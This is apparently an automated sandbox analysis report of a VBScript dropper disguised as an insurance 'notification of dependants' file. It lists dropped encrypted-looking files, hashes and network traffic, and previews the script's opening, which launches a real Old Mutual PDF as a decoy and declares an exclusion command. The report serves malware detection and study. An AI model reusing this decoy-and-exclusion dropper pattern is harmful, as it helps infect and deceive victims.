                                                                                                                                            Preview:....R.Xv0A...ev...o..?......xW.O.\...hj21..c..Q..6.....b..Q.J."L.>s..(.T..kM:....S.....%A.W...<.:.+.c.$...<.o.9jtQ....Q......?..vN.?.B..!^..X...1..-.SF..C......_...<B...a...A..^..{+........Q.....}..c..pHE..k.".3V...6.o.`c.8`..nh.a.....D......0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):266
                                                                                                                                            Entropy (8bit):7.3323359598478355
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:NcF5SiWz5tWqq2tKd1BIbvspN4U/ZfDxeDWmUENn:KFRWlkqVtKd17XVx33yn
                                                                                                                                            MD5:888788E2241A050924F5692DFE0B6057
                                                                                                                                            SHA1:EE6C77E0FEF0A46C7A4AA078B726058F43000C24
                                                                                                                                            SHA-256:D1746E62B718AB0915AFB38805E1E18DD089429FD97809AB087AE67BCB14529C
                                                                                                                                            SHA-512:C3540E9DB908421009402359BCC905A7320888F7B4135493C610AC24A8FEA1195006B4D047DC4815219C066FEF738441776CF01ECAC4C4FDD8E31C74F9EE1A7B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.K...mMT*.|.H)..#. :...y6.u.........Pn...F.s#E..$.._8...kZ.._F.....+..n.^.=)..2. 2..cV...H.+(."TKS..v.KL.j..}.....MJ......7~.....S.>....U.Yi.NJ...L...K....V&..h*...@.-D.C....x...3"q...x.)....au.%..Wz?.#..J&..........'}.\p.l.......Z....Z.!..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):266
                                                                                                                                            Entropy (8bit):7.196099753240585
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:cIcUI9Y776l4LsZ0VWDfTPh5y/IzmEYNSXPnYYSJq1CkSn:cIcT9Dyp8DF5ywzmbAAnUSn
                                                                                                                                            MD5:A49C93AFF594A17D3FFB8094BE5E2967
                                                                                                                                            SHA1:1BD1B5D89CDA2DF5284DCDFA49ADF82AE622288A
                                                                                                                                            SHA-256:0ECA84BFD93FA81E06F5DCC2663785D73FDCBEDA334C1FA427D4F7C8F329A812
                                                                                                                                            SHA-512:6F8061382F7FC49933F8E9DA233D8B4EEC87918404CDDF82BB039ADC6E466179D939B0ADCA20950FA3EA6F40B7676905C9E3621F571C6C8B5CC5E24A534E2C6E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1.m....p.9P.."..C........SQ....fb..vd.m..^4W.....~.#..cc.aH.G.Y.m.N~.4.9..4..n.K.Q....#...rq..+.&%.Y.k.].=...#(.....X:..j...Z....."_...1{.D.3..kF._..V._5>10..........4.6q.;...Q.x.XYdo18.S..puX.....Sl...N..%ItW...1.'.NFy&.=..-.m6..Y....O.....m..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):266
                                                                                                                                            Entropy (8bit):7.213198424239896
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6dII2zctrLyzISuPHUXv438N6EQVuZ/1e3w3dVp6eH2n:6dIvYt+ISdQ3c6rV61e3w16o2n
                                                                                                                                            MD5:1EF0AB1EB5302C7DAC4632455B593087
                                                                                                                                            SHA1:81414B3E8761091751C27E8C950988603959153E
                                                                                                                                            SHA-256:1930FBB3691E925949946C76A3CBA636BA6FA6C003E51DB641FB94287415BD71
                                                                                                                                            SHA-512:DF4AC67BEA5FCD065B012A39CAC9C0DEFA944357C7C7C3EA6E77E5244DDD0FF934411015DABEE0B1B0BEC17F22749803CB41A22BAF83F523FD1C8F8B8101474D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..7."zVc..S..7.A......w.K...m.:..L.....|.o1....VQ8cO.8....".......-y../..4YfU~..+.......bL.rGE.......F..*fy...@hJ.Q.5...J.........M.....Ky.&.=.hh{s-*..*L..w.a.A##.........S...I...w2:...0lT..tr.A.t[..I....C+..jk...QCI.W....5...PQ.y.+].J..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):286
                                                                                                                                            Entropy (8bit):7.250021107680393
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:740WelWrwxAHW6HnrJKI6e4LBkmV9xed2klJ9xQ33cUwn:8HqA22rJKI6Pl/D8zSH6n
                                                                                                                                            MD5:EDBA49EF41AF6AC201C1DF965E2B0D9A
                                                                                                                                            SHA1:AADFA5A7FC42FC83F06256F3EA1E749E4FC2F544
                                                                                                                                            SHA-256:9F67223F54BD3EB537C12E85897A66E731E45EE667DC8F99E3AD3D992B0533EB
                                                                                                                                            SHA-512:E1E42FF05EFC9C7E0653DF318F87495C69F35C449A12811665924B60F5DDC1CF2D64F5B364B17F94E9660E2B1357EE194EDD4DC8FBF8AB8BDBF2483BAD5A202C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......B9....[.......V.l...i(.yL2.....E...uU.aQfN.-..M.7..e....H..N.E~Q..J.9.......|].i.>|.B....#.p...r...r.....}.Pu....;....O..'.g.b.y..xr.a.O="...~..o...1L8D....RG.E?z./zC._s....o...3e.>....i/(.C.J.l..._._..gX....R.........k.....U.. .h.J2.oD'&..."..L..8.AeT.vH..'0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):286
                                                                                                                                            Entropy (8bit):7.250021107680393
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:740WelWrwxAHW6HnrJKI6e4LBkmV9xed2klJ9xQ33cUwn:8HqA22rJKI6Pl/D8zSH6n
                                                                                                                                            MD5:EDBA49EF41AF6AC201C1DF965E2B0D9A
                                                                                                                                            SHA1:AADFA5A7FC42FC83F06256F3EA1E749E4FC2F544
                                                                                                                                            SHA-256:9F67223F54BD3EB537C12E85897A66E731E45EE667DC8F99E3AD3D992B0533EB
                                                                                                                                            SHA-512:E1E42FF05EFC9C7E0653DF318F87495C69F35C449A12811665924B60F5DDC1CF2D64F5B364B17F94E9660E2B1357EE194EDD4DC8FBF8AB8BDBF2483BAD5A202C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......B9....[.......V.l...i(.yL2.....E...uU.aQfN.-..M.7..e....H..N.E~Q..J.9.......|].i.>|.B....#.p...r...r.....}.Pu....;....O..'.g.b.y..xr.a.O="...~..o...1L8D....RG.E?z./zC._s....o...3e.>....i/(.C.J.l..._._..gX....R.........k.....U.. .h.J2.oD'&..."..L..8.AeT.vH..'0xABADCABA
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):55
                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (6862)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):8659
                                                                                                                                            Entropy (8bit):5.098592076653995
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:msuoUzXUC3A6ld0fIV984rNqfQlAdavqa5mRLvO9Sy:mszUgCw6ld0b434VOR
                                                                                                                                            MD5:07E7B8F62AEFFEC7850F22855EBFE818
                                                                                                                                            SHA1:D67C2DF8C2798147B0997CE17B3242166ED12CBD
                                                                                                                                            SHA-256:4CFCF186989B4830F222A0F77D16FDC6DDDB5F44DD79F18DEE88595DA5989FCE
                                                                                                                                            SHA-512:2ACB7A8CF340C8D48A2589695877A4BDE31142CC01773017B65C393AC2ADEC69C6C1434D734F4BAAA712BCC3E55F6706B9BCF8CB1FDE141E4CA7394242BB0BC7
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://www.oldmutual.co.za/favicon.ico
                                                                                                                                            Preview:<!DOCTYPE html>.<html data-html-server-rendered="true" lang="en" data-vue-tag="%7B%22lang%22:%7B%22ssr%22:%22en%22%7D%7D">. <head>. <title> </title><meta name="gridsome:hash" content="55c89f967fc8e8bd1206d13d9211fd55758b5c6d"><meta data-vue-tag="ssr" name="google-site-verification" content="xrUvgzX2k1AWgqdiKqT0ugSWjNwSSE7w9lU2QF7EdsU"><meta data-vue-tag="ssr" name="facebook-domain-verification" content="k5kqrz6e2we7gyh2h56gfcpcln7rph"><meta data-vue-tag="ssr" http-equiv="X-UA-Compatible" content="IE=edge"><meta data-vue-tag="ssr" charset="utf-8"><meta data-vue-tag="ssr" name="generator" content="Gridsome v0.7.14"><meta data-vue-tag="ssr" data-key="viewport" name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover"><meta data-vue-tag="ssr" data-key="format-detection" name="format-detection" content="telephone=no"><meta data-vue-tag="ssr" name="google-site-verification" content="PY7wyunD0P7mjVCjJNIhZSONqGdouJT4OI3tT5J-tHA"><link data-vue-tag="ssr" rel="icon" t
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PDF document, version 1.6 (zip deflate encoded)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):313058
                                                                                                                                            Entropy (8bit):7.489403200507457
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:fIS2SsoMIr16Q9wt0I/pK9UW4cAgfmi+gKr116umiFBgKw1AlHCgKP1BSljgKr+g:fn2SVMIrIQ9c0I/s9U1cSrhjwvPnEr+g
                                                                                                                                            MD5:0B46EEFB0F38BAF77484929DD67DB02C
                                                                                                                                            SHA1:DE2CE2981F80DEB18935A2D7C76862D049FE7E2A
                                                                                                                                            SHA-256:496212C9D3B71BF483C6B97E4803E00B46B5F8AE731FE4EAE73F614B41F22163
                                                                                                                                            SHA-512:04A0518619385AC7E64A0B2122038C946A22E6E61A06FE539AB389EEB8C2414BF95A6D15DF2478E02F5733F4F2A8C4981B9D35BDE44C59FCD746B020E4B55172
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                            Preview:%PDF-1.6.%......1196 0 obj.<</Filter/FlateDecode/First 418/Length 3681/N 46/Type/ObjStm>>stream..h..Z{o.9..*.....0b7.M`.@.....v.v.7...m.m7FRk[.L|..~E.e..'.L...WU..X/.....[.Im2o\.Ek.Rb.`..........SRGf2/..gRZ...1.l.LZU.......I..F.S....T.;.L..3..u....v:....t<......v.F.dV.t......N..e3.%(+....A.T*GX>+-...,%8t.....Hb|iB `M\...e.......e....=K..=.z.=C.MN....z%.$z..4..P.S..x..SP......i..06N.._...j.\^..&.....7..r.)t....u....@~Z..2....7..._.8Bw..}=.....l.}.9...8.._.=>....^w.YX?..f.^.._..0.1.........r.d.8....dE....U.`...].]/...2.x..B.....<...r.........u...i...wU.I.7....hok.)......:.7M....lA..M...e....u%a.9.y..-......b.-.Rs......}..?./s.J.e.p....<....s....X.L..R.].l........Y.....6c9..Xq[...#..."W..2.cF(...=@....*&....E=_7..Q...qV.rq...p.h..B......^...e........P......[..gP.+_O>.zU..fU...n)...N...C.J.|..W~j......#{y.. ..g".........nQ.....n.S"N.dR.......&.K......i.y.\n.u......9P0.....`.7.Yx.).3}.{p..z.(....:......*...&...e.mpG...3......9.p...3....FA..{...f.0.....
                                                                                                                                            Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):48
                                                                                                                                            Entropy (8bit):4.305255793112395
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:8yzGc7C1RREal:nzGtRV
                                                                                                                                            MD5:6ED2062D4FB53D847335AE403B23BE62
                                                                                                                                            SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                                                                                                                                            SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                                                                                                                                            SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ERROR:...Description = Initialization failure...
                                                                                                                                            Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):283
                                                                                                                                            Entropy (8bit):4.84674468132717
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:PzXULmWxHLTpUrUDOwUsW3CNcwAFeMmvVOIHJFxMVlmJHaVFlr1Ilr80yn:P+pTpcUqnsTDAFSkIrxMVlmJHaVv1UZy
                                                                                                                                            MD5:0C5350B252EEAAC53344AD1EA0C3CB21
                                                                                                                                            SHA1:B7AF4076D8916706D8370FBA3902D14610ABABB7
                                                                                                                                            SHA-256:B49600A2FAE3809A53FE0D2313053405295B7AC71ED45885FB8AB6D47BBA991B
                                                                                                                                            SHA-512:D404762DFAB7008F43B0B4DD0430C8C866B29CE5C867489EFB94C48165B4F189B1C048154DC1895158200976FC0F8FAABB25C035C701F4334F6D5BC3997E2663
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..Pinging 1.1.1.1 with 32 bytes of data:..Reply from 1.1.1.1: bytes=32 time=138ms TTL=55....Ping statistics for 1.1.1.1:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 138ms, Maximum = 138ms, Average = 138ms..
                                                                                                                                            File type:ASCII text
                                                                                                                                            Entropy (8bit):5.2881261282545475
                                                                                                                                            TrID:
                                                                                                                                              File name:NOTIFICATION_OF_DEPENDANTS.vbs
                                                                                                                                              File size:1'009 bytes
                                                                                                                                              MD5:78d392dbb4dacec38ea4f6efaeb62797
                                                                                                                                              SHA1:f2766170575b017fe801c4c98d58dfa1baf0818b
                                                                                                                                              SHA256:8dfebd7977251503d34f06b75d8b76a518c6f07ef52e3724aed9c3d9158a662e
                                                                                                                                              SHA512:3b3125cf9470e130823e6b73993901c78270b2e321c6fb04fa4253fbb5f5193f267ef9739abf9327ec56259a91950fa19e91fcee3cdad630d3455d45f9ca4cc7
                                                                                                                                              SSDEEP:24:EDv3D5nX10YJnELUPDVKOpiFMpwkyVlK/u9ospkvyEFUC:8z5nl0YJE4hpgM+S/r7v7
                                                                                                                                              TLSH:26111023F2FC032E27EE82B0D1B517F86E93DB020D6461674B34FD4552482A9C3B668D
                                                                                                                                              File Content Preview:' Define the command to execute .Dim command, command1, command3, tempFolder, exclusionCommand.command = "cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Bene
                                                                                                                                              Icon Hash:68d69b8f86ab9a86
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Dec 19, 2024 07:52:10.843652010 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:10.846281052 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:10.849699974 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:10.850797892 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:10.850856066 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:10.850879908 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:10.850895882 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:10.853123903 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:10.853496075 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:10.954361916 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:10.954474926 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:10.957561970 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:10.972733974 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.014442921 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.042474985 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.046036005 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.077131033 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.164835930 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.164961100 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.165616035 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.167920113 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.169379950 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.169454098 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.169469118 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.169509888 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.173078060 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.173916101 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.292674065 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.334391117 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.376955032 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.387280941 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.482918978 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.483082056 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.485408068 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.485503912 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.489878893 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.489937067 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.489953041 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.489998102 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.506912947 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.512461901 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.515254021 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.515773058 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.559128046 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.631980896 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.634690046 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.635198116 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.678694963 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.701731920 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.752671957 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.829607964 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.829648018 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.829742908 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.870832920 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.884372950 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.911127090 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.916893005 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.917792082 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.934393883 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:11.934485912 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:11.939363003 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.030708075 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.037225008 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.106626034 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.586909056 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.586925983 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.586936951 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.586947918 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.587125063 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.587337017 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.587393045 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.587652922 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.587721109 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.640975952 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.643734932 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.643946886 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.645186901 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.645262957 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.760797024 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.763226032 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.763427019 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.764637947 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.764679909 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.955735922 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.955826998 CET49677443192.168.2.920.189.173.11
                                                                                                                                              Dec 19, 2024 07:52:12.958224058 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.958318949 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.958349943 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.961025953 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.961119890 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:12.961136103 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.967833996 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.971571922 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.995069027 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:12.996084929 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.007893085 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.087543964 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.091996908 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.096436977 CET49676443192.168.2.923.206.229.209
                                                                                                                                              Dec 19, 2024 07:52:13.097069979 CET49675443192.168.2.923.206.229.209
                                                                                                                                              Dec 19, 2024 07:52:13.116745949 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.118448019 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.129607916 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.308692932 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.309319973 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.309400082 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.311965942 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.312477112 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.330832958 CET49674443192.168.2.923.206.229.209
                                                                                                                                              Dec 19, 2024 07:52:13.427993059 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.428013086 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.428073883 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.430604935 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.430779934 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.547436953 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.547452927 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.547492981 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.550081968 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.550216913 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.551104069 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.629053116 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.629082918 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.629132032 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.629165888 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.635149956 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.635761976 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.670746088 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.746165991 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.746205091 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.746285915 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.746315956 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.749392033 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.749550104 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.754664898 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.755300999 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.868984938 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.869115114 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.937932968 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.942009926 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.951837063 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.951878071 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:13.951941967 CET49706443192.168.2.913.107.246.63
